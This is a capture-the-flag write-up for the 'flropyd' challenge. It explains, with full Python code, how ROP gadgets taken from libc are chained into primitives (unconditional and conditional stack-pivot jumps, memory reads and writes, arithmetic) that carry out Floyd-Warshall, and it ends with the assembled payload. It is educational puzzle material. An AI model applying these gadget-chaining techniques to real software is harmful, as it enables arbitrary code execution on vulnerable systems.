# flropyd (366pt)

`Reversing`

Description: People always say that rop is turing complete, show me by implementing the Floyd-Warshall algorithm

system: ubuntu-18.04

update2: md5(libc.so.6) == 50390b2ae8aaa73c47745040f54e602f

Files: flropyd

Solution:

This was a super fun challenge. The program gives you the address of `malloc` in libc and asks you to provide a ropchain that will “implement the Floyd-Warshall algorithm.”

The program checks this by first chosing a random, bounded integer `N` (stored at `0x602060`) and then creating a random weighted edge matrix that starts at `0x602068` in memory.

The program then calls `fork` and the child program severely sandboxes itself and then executes the ropchain. The parent program executes it’s own version of the Floyd-Warshall algorithm which converts the edge matrix into a shortest-distance matrix.

The edge matrix in the parent’s memory is compared to the child and if they are equal, the check succeeds. Then this process is repeated 9 more times to verify that the ropchain actually works and if all checks pass, you get the flag.

The edge matrix is always a 64x64 qword array but only the values up to `N` are set during initialization.

In order to complete this challenge, we need to write a ropchain that does the following:

``````for a in range(N):
for b in range(N):
for c in range(N):
if edges[b][c] > edges[b][a] + edges[a][c]:
edges[b][c] = edges[b][a] + edges[a][c]
``````

This is a fairly simple algorithm but some difficulties arise when trying to implement it via ROP.

My approach was to build up a set of ROP primatives that could perform progressively higher level operations.

The first task was to find a series of gadgets that could implement “jump if less than”. Since our ROP “instruction pointer” is actually just the stack pointer, we need to find some gadgets that can conditionally modify the stack pointer based on two arguments.

This was definitely the hardest part of the challenge. When the child program initially executes the ropchain, it has been copied onto the stack. However, the same ropchain also exists in the data section (it starts at `0x60a080`). If we can transition from executing the stack ropchain (with large 64 bit addresses) to the data section ropchain, we can use gadgets that just modifiy `esp` and we can use absolute ropchain addresses.

This is my unconditional jump primative:

``````def jump(addr):
buf = ''

buf += p64(base + 0x00000000000439c8) # pop rax

# fix spacing
buf += p64(base + 0x000000000003eb0b) # pop rcx
buf += p64(base + 0x000000000003eb0b) # pop rcx

buf += p64(base + 0x00000000000941b1) # mov qword ptr [rsp + 8], rax ; call rcx
buf += p64(base + 0x0000000000003960) # pop rsp
buf += p64(0) # junk (gets overwritten)

return buf
``````

It works by setting `rax` and then writing `rax` to `rsp + 8`. It has the side effect of calling `rcx` so beforehand, we need to set `rcx` to a gaget that pops a single register so that we uncorrupt the stack. In this case, I just set `rcx` to point to the `pop rcx` gadget. Finally we hit `pop rsp` which pops the value that we wrote with `rax` and acts as a jump.

Next, I created a simple “write what where” gadget that allows me to put a value in memory:

``````def write_what_where(mem, val):
buf = ''
buf += p64(base + 0x000000000003eb0b) # pop rcx ; ret
buf += p64(val)
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(mem)
buf += p64(base + 0x00000000000a8094) # mov qword ptr [rdx], rcx ; ret
return buf
``````

Then I was able to find a gadget that sets `esp` and with some interesting logic, it is possible to conditionally set this value. I created the following primitive which compares the value in two memory locations and “jumps” to one address if the first is less than the other, or the second otherwise:

``````def if_less_than_mem_mem_better(mem, mem2, addr_lt, addr_gte):
buf = ''

# dereference second memory value and store in rdx
buf += p64(base + 0x00000000000439c8) # pop rax
buf += p64(mem2)
buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]
buf += p64(base + 0x00000000001415dd) # mov rdx, rax

# dereference first memory value and store in rax
buf += p64(base + 0x00000000000439c8) # pop rax
buf += p64(mem)
buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]

# perform subtraction
buf += p64(base + 0x00000000000438fd) # sub rax, rdx

# arithmetic shift to get 0 or -1
buf += p64(base + 0x0000000000134bfc) # sar rax, 6
buf += p64(base + 0x0000000000134bfc) # sar rax, 6
buf += p64(base + 0x0000000000134bfc) # sar rax, 6

# compute correct address for jump table
buf += p64(base + 0x000000000002155f) # pop rdi
buf += p64(8)
buf += p64(base + 0x0000000000023e6a) # pop rsi
buf += p64(0x602030)
buf += p64(base + 0x00000000001216de) # and rax, rdi ; or rax, rsi

# if lt, rax = 0x602038
# else, rax = 0x602030

buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]

# set rdx to ret gadget
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(base + 0x00000000000008aa) # ret

# set stack pointer
buf += p64(base + 0x000000000003ecaa) # mov esp, eax ; mov rbp, r9 ; nop ; jmp rdx

return buf
``````

This primative firsts sets `rax` and `rdx` to the values in the two memory locations. Then it performs `sub rax, rdx` and shifts the result so that we end up with either all 1’s (-1 in two’s compliment) or all zeros.

Then it performs `(rax & 0x8) + 0x602030` which sets `rax` to point to `0x602038` if `rax < rdx` otherwise it will point to `0x602030`. By putting the two stack addresses we would like to jump to in these corresponding memory locations, we can dereference it and call the `mov esp, eax` gadget.

The only `mov esp, eax` gadget also jumps to `rdx` as a side effect so we can just set `rdx` to point to a `ret` gadget in order to preserve the stack.

Next, I found it useful to create a `copy_memory` primative that can copy a value from one address to another. This was fairly simple:

``````def copy_memory(mem_from, mem_to):
buf = ''
buf += p64(base + 0x00000000000439c8) # pop rax
buf += p64(mem_from)
buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(mem_to)
buf += p64(base + 0x000000000003093c) # mov qword ptr [rdx], rax
return buf
``````

In order to index into the edge array, I created a primative that would take two memory locations that hold index values and a third location that would receive the value of the edge array:

``````def index_edge_array(mem_idx1, mem_idx2, save_to):
buf = ''

# copy index1 to junk counter
buf += copy_memory(mem_idx1, 0x602058)

# compute (idx1 * 64)
buf += p64(base + 0x000000000002155f) # pop rdi
buf += p64(0x602058 + 5)
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1

# dereference temp into edi
# edi = (idx1 * 64)
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(0x602058)
buf += p64(base + 0x00000000001ab806) # mov edi, dword ptr [rdx]

# dereference idx2
# rax = idx2
buf += p64(base + 0x00000000000439c8) # pop rax
buf += p64(mem_idx2)
buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]

# rax = idx2 + (idx1 * 64)
buf += p64(base + 0x00000000000a8473) # add rax, rdi

# save intermediate computation to temp memory
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(0x602058)
buf += p64(base + 0x000000000003093c) # mov qword ptr [rdx], rax

# shift left 3 times
buf += p64(base + 0x000000000002155f) # pop rdi
buf += p64(0x602058 + 5)
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1

# dereference temp into edi
# edi = (idx2 + (idx1 * 64)) * 8
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(0x602058)
buf += p64(base + 0x00000000001ab806) # mov edi, dword ptr [rdx]

buf += p64(base + 0x00000000000439c8) # pop rax
buf += p64(0x602068)

# rax = (idx2 + (idx1 * 64)) * 8 + 0x602068
buf += p64(base + 0x00000000000a8473) # add rax, rdi

# lookup the edge value at this address
buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]

# save the value to the memory location
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(save_to)
buf += p64(base + 0x000000000003093c) # mov qword ptr [rdx], rax

return buf
``````

This function performs `*save_to = edges[*mem_idx1][*mem_idx2]`. I used the location at `0x602058` as scratch memory since the `shl` gadget I found operated directly on memory values rather than register values.

Similarly, I wrote a primative that can save a value to the edge array. It is nearly identical:

``````def write_index_edge_array(mem_idx1, mem_idx2, load_from):
buf = ''

# copy index1 to junk counter
buf += copy_memory(mem_idx1, 0x602058)

# compute (idx1 * 64)
buf += p64(base + 0x000000000002155f) # pop rdi
buf += p64(0x602058 + 5)
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1

# dereference temp into edi
# edi = (idx1 * 64)
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(0x602058)
buf += p64(base + 0x00000000001ab806) # mov edi, dword ptr [rdx]

# dereference idx2
# rax = idx2
buf += p64(base + 0x00000000000439c8) # pop rax
buf += p64(mem_idx2)
buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]

# rax = idx2 + (idx1 * 64)
buf += p64(base + 0x00000000000a8473) # add rax, rdi

# save intermediate computation to temp memory
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(0x602058)
buf += p64(base + 0x000000000003093c) # mov qword ptr [rdx], rax

# shift left 3 times
buf += p64(base + 0x000000000002155f) # pop rdi
buf += p64(0x602058 + 5)
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1

# dereference temp into edi
# edi = (idx2 + (idx1 * 64)) * 8
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(0x602058)
buf += p64(base + 0x00000000001ab806) # mov edi, dword ptr [rdx]

buf += p64(base + 0x00000000000439c8) # pop rax
buf += p64(0x602068)

# rax = (idx2 + (idx1 * 64)) * 8 + 0x602068
buf += p64(base + 0x00000000000a8473) # add rax, rdi

# move the edge pointer into edi
# (in a convoluted way)
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(0x602058)
buf += p64(base + 0x000000000003093c) # mov qword ptr [rdx], rax
buf += p64(base + 0x00000000001ab806) # mov edi, dword ptr [rdx]

buf += p64(base + 0x00000000000439c8) # pop rax
buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]

# save new edge value
buf += p64(base + 0x000000000003fdfa) # mov qword ptr [rdi], rax ; xor eax, eax

return buf
``````

Finally, I needed a primative that could add two memory locations:

``````def add_mem_mem(mem_a, mem_b):
buf = ''

buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(mem_a)
buf += p64(base + 0x00000000001ab806) # mov edi, dword ptr [rdx]

buf += p64(base + 0x00000000000439c8) # pop rax
buf += p64(mem_b)
buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]

buf += p64(base + 0x00000000000a8473) # add rax, rdi

# store in mem_a
buf += p64(base + 0x0000000000001b96) # pop rdx
buf += p64(mem_a)
buf += p64(base + 0x000000000003093c) # mov qword ptr [rdx], rax

return buf
``````

and a primative that could increment a memory location:

``````def increment_memory(mem):
buf = ''
buf += p64(base + 0x000000000003eb0b) # pop rcx ; ret
buf += p64(mem + 0x77)
buf += p64(base + 0x00000000000ea224) # inc dword ptr [rcx - 0x77]
return buf
``````

Using these primatives we can write some assembly-like pseudocode:

``````# memory address that store local variable values
VAR_A = 0x602040
VAR_B = 0x602048
VAR_C = 0x602050

TEMP_0 = 0x602018
TEMP_1 = 0x602020

# size of edge array
NUM = 0x602060

_rop_init_I_guess:
jump(<start>) # move to the ropchain in the data section

start:
write_what_where(VAR_A, 0)    # var a = 0

a_loop:
write_what_where(VAR_B, 0)    # var b = 0

b_loop:
write_what_where(VAR_C, 0)    # var c = 0

c_loop:
# index into the edge array and save to memory
index_edge_array(VAR_A, VAR_C, TEMP_0)      # temp_0 = e[c][a]
index_edge_array(VAR_B, VAR_A, TEMP_1)      # temp_1 = e[a][b]

# temp_0 = e[c][a] + e[a][b]

index_edge_array(VAR_B, VAR_C, TEMP_1)      # temp_1 = e[c][b]

# if e[c][a] + e[c][b] < e[c][b] {CONT}{SKIP}
if_less_than_mem_mem_better(TEMP_0, TEMP_1, <cont>, <skip>)

cont:
# e[c][b] = e[c][a] + e[a][b]
write_index_edge_array(VAR_B, VAR_C, TEMP_0)

skip:
# c += 1
increment_memory(VAR_C)
if_less_than_mem_mem_better(VAR_C, NUM, <c_loop>, <inc_b>)

inc_b:
# b += 1
increment_memory(VAR_B)
if_less_than_mem_mem_better(VAR_B, NUM, <b_loop>, <inc_a>)

inc_a:
# a += 1
increment_memory(VAR_A)
if_less_than_mem_mem_better(VAR_A, NUM, <a_loop>, <done>)

done:
...
``````

For the final exploit, I put in print statements to compute the correct label addresses and then I hardcoded them into the rop primative calls for the final buffer:

``````buf = ''

# spacing to get to the first return address
buf += 'a' * 0x18

# jump {START}
buf += jump(0x60a0d0)

print('LABEL START: 0x%x' % (buf_base + len(buf)))

buf += write_what_where(0x602040, 0)    # var a = 0

print('LABEL A: 0x%x' % (buf_base + len(buf)))

buf += write_what_where(0x602048, 0)    # var b = 0

print('LABEL B: 0x%x' % (buf_base + len(buf)))

buf += write_what_where(0x602050, 0)    # var c = 0

print('LABEL C: 0x%x' % (buf_base + len(buf)))

# index into the edge array and save to memory
buf += index_edge_array(0x602040, 0x602050, 0x602018)   # 0x602018 = e[c][a]

print('LABEL second index: 0x%x' % (buf_base + len(buf)))

buf += index_edge_array(0x602048, 0x602040, 0x602020)   # 0x602020 = e[a][b]

print('LABEL add mem: 0x%x' % (buf_base + len(buf)))

buf += add_mem_mem(0x602018, 0x602020)  # 0x602018 = e[c][a] + e[a][b]

print('LABEL third index: 0x%x' % (buf_base + len(buf)))

buf += index_edge_array(0x602048, 0x602050, 0x602020)   # 0x602020 = e[c][b]

print('LABEL comparison: 0x%x' % (buf_base + len(buf)))

# if e[c][a] + e[c][b] < e[c][b] {CONT}{SKIP}
buf += if_less_than_mem_mem_better(0x602018, 0x602020, 0x60a630, 0x60a788)

print('LABEL CONT: 0x%x' % (buf_base + len(buf)))

buf += write_index_edge_array(0x602048, 0x602050, 0x602018)

print('LABEL SKIP: 0x%x' % (buf_base + len(buf)))

# c += 1
buf += increment_memory(0x602050)

# if (c < *num) {C}{INC_B}
buf += if_less_than_mem_mem_better(0x602050, 0x602060, 0x60a148, 0x60a890)

print('LABEL INC_B: 0x%x' % (buf_base + len(buf)))

# b += 1
buf += increment_memory(0x602048)

# if (b < *num) {B}{INC_A}
buf += if_less_than_mem_mem_better(0x602048, 0x602060, 0x60a120, 0x60a998)

print('LABEL INC_A: 0x%x' % (buf_base + len(buf)))

# a += 1
buf += increment_memory(0x602040)

# if (a < *num) {A}{DONE}
buf += if_less_than_mem_mem_better(0x602040, 0x602060, 0x60a0f8, 0x60aaa0)

print('LABEL DONE: 0x%x' % (buf_base + len(buf)))
``````